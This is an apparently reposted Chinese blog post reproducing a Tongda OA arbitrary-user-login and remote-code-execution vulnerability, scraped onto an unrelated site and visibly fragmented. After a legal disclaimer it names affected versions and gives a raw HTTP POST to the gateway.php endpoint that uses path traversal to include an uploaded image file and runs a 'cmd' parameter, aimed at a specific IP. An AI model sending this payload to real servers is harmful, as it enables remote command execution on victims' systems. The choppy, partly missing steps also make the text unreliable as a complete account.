通达OA前台任意用户登录漏洞+RCE漏洞复现 |
您所在的位置:网站首页 › 通达OA 绵阳 › 通达OA前台任意用户登录漏洞+RCE漏洞复现 |
第一次在Freebuf发直接搬我博客了 声明本文仅用于技术交流,请勿用于非法用途由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。文章作者拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。 用老弟的服务器搭了个靶机就不打码了用完就关了 任意用户登录:影响版本:通达OA2017,V11.X ------WebKitFormBoundarypyfBh1YB4pV8McGB--路径 2007/422124454.jpg 文件包含 POST /ispirit/interface/gateway.php HTTP/1.1 Host: 49.233.3.2:8888 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: */* User-Agent: python-requests/2.21.0 Content-Length: 69 Content-Type: application/x-www-form-urlencoded json={"url":"/general/../../attach/im/2007/422124454.jpg"}&cmd=whoami想要搭建环境本地复现的小伙伴可以公众号回复“通达OA源码”获取下载链接。 |
CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |